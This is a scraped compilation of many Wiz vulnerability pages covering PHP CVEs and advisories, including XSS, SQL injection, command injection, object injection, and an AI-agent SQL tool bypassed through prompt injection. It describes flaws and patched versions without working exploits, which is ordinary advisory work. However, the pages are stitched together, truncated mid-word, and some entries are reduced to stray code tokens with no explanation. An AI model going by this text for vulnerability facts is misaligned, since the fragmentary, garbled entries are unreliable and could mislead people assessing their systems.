Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
GHSA-93fx-5qgc-wr38 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-93fx-5qgc-wr38 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-93fx-5qgc-wr38 :
PHP vulnerability analysis and mitigation
## Summary
ConfigWriter::cleanUpString()
#{...}
StationPermissions::Media
StationPermissions::Profile
#{...}
process.run()
## Root Cause
backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php
public static function cleanUpString(?string $string): string
{
return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}
"
'
#{...}
\
#{expression}
process.run()
## Injection Points
cleanUpString()
.liq
playlist.remote_url
Media
input.http("...")
playlist("...")
station.name
Profile
name = "..."
station.description
Profile
description = "..."
station.genre
Profile
genre = "..."
station.url
Profile
url = "..."
backend_config.live_broadcast_text
Profile
settings.azuracast.live_bro
Wiz
CVE-2025-68614 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2025-68614 [MEDIUM] CVE-2025-68614 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68614 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.12.0, the Alert Rule API is vulnerable to stored cross-site scripting. Alert rules can be created or updated via LibreNMS API. The alert rule name is not properly sanitized, and can be used to inject HTML code. This issue has been patched in version 25.12.0.
Source : NVD
## 5.4
Score
Published December 23, 2025
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
librenms/librenms
Sources
NVD
Composer
Wiz
CVE-2026-25878 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-25878 [MEDIUM] CVE-2026-25878 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25878 :
PHP vulnerability analysis and mitigation
FroshAdminer is the Adminer plugin for Shopware Platform. Prior to 2.2.1, the Adminer route (/admin/adminer) was accessible without Shopware admin authentication. The route was configured with auth_required=false and performed no session validation, exposing the Adminer UI to unauthenticated users. This vulnerability is fixed in 2.2.1.
Source : NVD
## 6.9
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
frosh/adminer-platform
Sources
NVD
Composer Severity MEDIUM
Wiz
CVE-2025-69216 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-69216 [HIGH] CVE-2025-69216 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69216 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an authenticated SQL injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability exists in templates/scadenzario/init.php, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization. The vulnerability enables complete database read access through error-based SQL injection techniques.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Aff
Wiz
CVE-2026-28426 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-28426 [HIGH] CVE-2026-28426 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28426 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, stored XSS vulnerability in svg and icon related components allow authenticated users with appropriate permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
Source : NVD
## 5.4
Score
Published February 27, 2026
Severity MEDIUM
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity HI
Wiz
CVE-2026-33686 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-33686 [HIGH] CVE-2026-33686 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33686 :
PHP vulnerability analysis and mitigation
src/Utils/FileUtil.php
FileUtil::explodeExtension()
pathinfo(PATHINFO_EXTENSION)
strrpos()
Source : NVD
## 8.8
Score
Published March 26, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 21.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
code16/sharp
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component
Wiz
CVE-2026-33160 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.7
CVE-2026-33160 [LOW] CVE-2026-33160 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33160 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, an unauthenticated user can call assets/generate-transform with a private assetId, receive a valid transform URL, and fetch transformed image bytes. The endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL. This issue has been patched in versions 4.17.8 and 5.9.14.
Source : NVD
## 2.7
Score
Published March 24, 2026
Severity LOW
CNA Score 2.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.7
Wiz
CVE-2026-21449 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2026-21449 [HIGH] CVE-2026-21449 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21449 :
PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via first name and last name from a low-privilege user. Version 2.3.10 fixes the issue.
Source : NVD
## 7.4
Score
Published January 2, 2026
Severity HIGH
CNA Score 7.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on wha
Wiz
CVE-2026-25490 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-25490 [MEDIUM] CVE-2026-25490 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25490 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the 'Address Line 1' field in Inventory Locations is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.5
Exploitation Probability (EPSS
Wiz
CVE-2026-25483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-25483 [MEDIUM] CVE-2026-25483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25483 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce’s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.2
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Wiz
CVE-2025-70792 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-70792 [MEDIUM] CVE-2025-70792 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-70792 :
PHP vulnerability analysis and mitigation
Cross Site Scripting vulnerability in the "/admin/category/create" endpoint of Microweber 2.0.19. An attacker can manipulate the "rel_id" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.
Source : NVD
## 6.1
Score
Published February 5, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
microweber/microweber
Sources
NVD
Composer S
Wiz
CVE-2026-34381 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-34381 [HIGH] CVE-2026-34381 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34381 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, Admidio relies on adm_my_files/.htaccess to deny direct HTTP access to uploaded documents. The Docker image ships with AllowOverride None in the Apache configuration, which causes Apache to silently ignore all .htaccess files. As a result, any file uploaded to the documents module regardless of the role-based permissions configured in the UI, is directly accessible over HTTP without authentication by anyone who knows the file path. The file path is disclosed in the upload response JSON. This issue has been patched in version 5.0.8.
Source : NVD
## 7.5
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.5
Affected Techn
Wiz
CVE-2026-33942 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33942 [HIGH] CVE-2026-33942 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33942 :
PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Versions prior to 4.0.0 used PHP's unserialize() in AccessTokenAuthenticator::unserialize() to restore OAuth token state from cache or storage, with allowed_classes => true. An attacker who can control the serialized string (e.g. by overwriting a cached token file or via another injection) can supply a serialized "gadget" object. When unserialize() runs, PHP instantiates that object and runs its magic methods (__wakeup, __destruct, etc.), leading to object injection. In environments with common dependencies (e.g. Monolog), this can be chained to remote code execution (RCE). The fix in version 4.0.0 removes PHP serialization from the AccessTokenA
Wiz
CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-31858 [HIGH] CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31858 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in CVE-2026-25495. The exact same SQL injection vulnerability (including criteria[orderBy], the original advisory vector) works on this controller because the fix was never applied to it. Any authenticated control panel user (no admin required) can inject arbitrary SQL via criteria[where], criteria[orderBy], or other query properties, and extract the full database contents via boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.
Source : NVD
## 8.7
Score
Published March 11, 2026
Severity HIGH
CNA Sc
Wiz
GHSA-5x2w-37xf-7962 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5x2w-37xf-7962 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5x2w-37xf-7962 :
PHP vulnerability analysis and mitigation
## Summary
The AVideo platform exposes a publicly accessible endpoint that performs server-side PGP decryption without requiring any form of authentication. Any anonymous user can submit a private key, ciphertext, and passphrase to the endpoint and receive the decrypted plaintext in the JSON response. This functionality is entirely unprotected, meaning no session, token, or credential is needed to invoke it.
## Details
The endpoint at decryptMessage.json.php accepts a JSON body containing three user-supplied fields: a private key, an encrypted message, and a key password. The server passes these directly into a decryption routine and returns the result. There is no call to any authentication or session validation fu
Wiz
CVE-2026-21861 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-21861 [CRITICAL] CVE-2026-21861 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21861 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS contains an OS command injection vulnerability in the core update functionality. An authenticated administrator can execute arbitrary OS commands on the server due to improper handling of user-controlled input that is directly passed to exec() without sufficient validation or escaping. This issue has been patched in version 5.2.3.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 58.9
Exploitation Probability (EPSS) 0.4
Affected packages and li
Wiz
CVE-2026-34245 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-34245 [MEDIUM] CVE-2026-34245 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34245 :
PHP vulnerability analysis and mitigation
plugin/PlayLists/View/Playlists_schedules/add.json.php
Source : NVD
## 6.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pub
Wiz
CVE-2026-33517 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33517 [HIGH] CVE-2026-33517 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33517 :
PHP vulnerability analysis and mitigation
%1$s
$s_tag_delete_message
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mantisbt/mantisbt
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53
Wiz
CVE-2026-33354 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-33354 [HIGH] CVE-2026-33354 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33354 :
PHP vulnerability analysis and mitigation
POST /objects/aVideoEncoder.json.php
chunkFile
isValidURLOrPath()
/var/www/
videos
.php
Source : NVD
## 6.5
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 7.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component
Wiz
CVE-2026-27131 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-27131 [MEDIUM] CVE-2026-27131 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27131 :
PHP vulnerability analysis and mitigation
hashData()
devMode
enablePlaygroundWhenDevModeDisabled
false
Source : NVD
## 5.5
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
putyourlightson/craft-sprig
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
CVE-2025-68455 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-68455 [HIGH] CVE-2025-68455 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68455 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Source : NVD
## 8.6
Score
Published January 5, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 78.7
Exploitation Probability (EPSS) 1.2
Affected packages and li
Wiz
CVE-2025-59022 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-59022 [HIGH] CVE-2025-59022 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59022 :
PHP vulnerability analysis and mitigation
Backend users who had access to the recycler module could delete arbitrary data from any database table defined in the TCA - regardless of whether they had permission to that particular table. This allowed attackers to purge and destroy critical site data, effectively rendering the website unavailable. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
## 7.1
Score
Published January 13, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.3
Exploitation Probability (EPSS) N/A
Affe
Wiz
CVE-2026-1217 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-1217 [MEDIUM] CVE-2026-1217 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1217 :
PHP vulnerability analysis and mitigation
The Yoast Duplicate Post plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the clone_bulk_action_handler() and republish_request() functions in all versions up to, and including, 4.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate any post on the site including private, draft, and trashed posts they shouldn't have access to. Additionally, attackers with Author-level access and above can use the Rewrite & Republish feature to overwrite any published post with their own content.
Source : NVD
## 5.4
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
WordPress
Has Publ
Wiz
CVE-2025-67509 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-67509 [HIGH] CVE-2025-67509 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67509 :
PHP vulnerability analysis and mitigation
Neuron is a PHP framework for creating and orchestrating AI Agents. Versions 2.8.11 and below use MySQLSelectTool, which is vulnerable to Read-Only Bypass. MySQLSelectTool is intended to be a read-only SQL tool (e.g., for LLM agent querying, however, validation based on the first keyword (e.g., SELECT) and a forbidden-keyword list does not block file-writing constructs such as INTO OUTFILE / INTO DUMPFILE. As a result, an attacker who can influence the tool input (e.g., via prompt injection through a public agent endpoint) may write arbitrary files to the DB server if the MySQL/MariaDB account has the FILE privilege and server configuration permits writes to a useful location (e.g., a web-accessible directory). This issue is f
Wiz
GHSA-6mp4-q625-mxjp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-6mp4-q625-mxjp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6mp4-q625-mxjp :
PHP vulnerability analysis and mitigation
## Summary
The callback and jsonp request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When YOURLS_PRIVATE is set to false (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.
## Details
yourls-api.php:127-128 if( isset( $_REQUEST['callback'] ) ) $return['callback'] = $_REQUEST['callback']; elseif ( isset( $_REQUEST['jsonp'] ) ) $return['callback'] = $_REQUEST['jsonp'];
includes/functions-api.php:127-128
$callback = isset( $output['callback'] ) ? $output['callback'] : '';
$result =
Wiz
CVE-2026-32818 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-32818 [MEDIUM] CVE-2026-32818 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32818 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the forum module in Admidio does not verify whether the current user has permission to delete forum topics or posts. Both the topic_delete and post_delete actions in forum.php only validate the CSRF token but perform no authorization check before calling delete(). Any authenticated user with forum access can delete any topic (with all its posts) or any individual post by providing its UUID. This is inconsistent with the save/edit operations, which properly check isAdministratorForum() and ownership before allowing modifications. Any logged-in user can permanently and irreversibly delete any forum topic (including all its posts) or any individu
Wiz
CVE-2026-34382 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-34382 [MEDIUM] CVE-2026-34382 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34382 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, the delete mode handler in mylist_function.php permanently deletes list configurations without validating a CSRF token. An attacker who can lure an authenticated user to a malicious page can silently destroy that user's list configurations — including organization-wide shared lists when the victim holds administrator rights. This issue has been patched in version 5.0.8.
Source : NVD
## 4.6
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.8
Ex
Wiz
CVE-2023-53957 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2023-53957 [HIGH] CVE-2023-53957 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53957 :
PHP vulnerability analysis and mitigation
Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.
Source : NVD
## 8.5
Score
Published December 19, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 37.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity HIGH No Fix Added at: Feb 21, 2026
## Get a CVE
Wiz
CVE-2026-25892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-25892 [HIGH] CVE-2026-25892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25892 :
PHP vulnerability analysis and mitigation
Adminer is open-source database management software. Adminer v5.4.1 and earlier has a version check mechanism where adminer.org sends signed version info via JavaScript postMessage, which the browser then POSTs to ?script=version. This endpoint lacks origin validation and accepts POST data from any source. An attacker can POST version[] parameter which PHP converts to an array. On next page load, openssl_verify() receives this array instead of string and throws TypeError, returning HTTP 500 to all users. Upgrade to Adminer 5.4.2.
Source : NVD
## 7.5
Score
Published February 9, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Adminer
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/
Wiz
CVE-2026-31823 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-31823 [MEDIUM] CVE-2026-31823 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31823 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. An authenticated stored cross-site scripting (XSS) vulnerability exists in multiple places across the shop frontend and admin panel due to unsanitized entity names being rendered as raw HTML. Shop breadcrumbs (shared/breadcrumbs.html.twig): The breadcrumbs macro uses the Twig |raw filter on label values. Since taxon names, product names, and ancestor names flow directly into these labels, a malicious taxon name like is rendered and executed as JavaScript on the storefront. Admin product taxon picker (ProductTaxonTreeController.js): The rowRenderer method interpolates ${name} directly into a template literal building HTML, allowing script injection through taxon names in
Wiz
CVE-2025-63644 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-63644 [MEDIUM] CVE-2025-63644 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-63644 :
PHP vulnerability analysis and mitigation
A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field.
Source : NVD
## 5.4
Score
Published January 14, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ph7software/ph7builder
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Jan 23, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnera
Wiz
CVE-2025-67849 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-67849 [HIGH] CVE-2025-67849 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67849 :
PHP vulnerability analysis and mitigation
A flaw was found in Moodle. This cross-site scripting (XSS) vulnerability, caused by improper sanitization of AI prompt responses, allows attackers to inject malicious HTML or script into web pages. When other users view these compromised pages, their sessions could be stolen, or the user interface could be manipulated.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 7.3
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle/moodle
moodle
Sources
NVD
Composer Severity HIGH Has Fix Add
Wiz
CVE-2026-34394 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-34394 [HIGH] CVE-2026-34394 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34394 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo's admin plugin configuration endpoint (admin/save.json.php) lacks any CSRF token validation. There is no call to isGlobalTokenValid() or verifyToken() before processing the request. Combined with the application's explicit SameSite=None cookie policy, an attacker can forge cross-origin POST requests from a malicious page to overwrite arbitrary plugin settings on a victim administrator's session. Because the plugins table is included in the ignoreTableSecurityCheck() array in objects/Object.php, standard table-level access controls are also bypassed. This allows a complete takeover of platform functionality by reconfiguring payment processors, auth
Wiz
CVE-2026-34559 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34559 [CRITICAL] CVE-2026-34559 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34559 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side. This stored payload is later rendered unsafely across public tag pages and administrative interfaces without proper output encoding, leading to stored cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9.1
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Pu
Wiz
GHSA-44px-qjjc-xrhq Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-44px-qjjc-xrhq Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-44px-qjjc-xrhq :
PHP vulnerability analysis and mitigation
## Summary
assets/preview-file
previewHtml
assetId
canView
false
## Details
assets/preview-file
assetId
The action does not enforce per-asset view authorization prior to returning preview content.
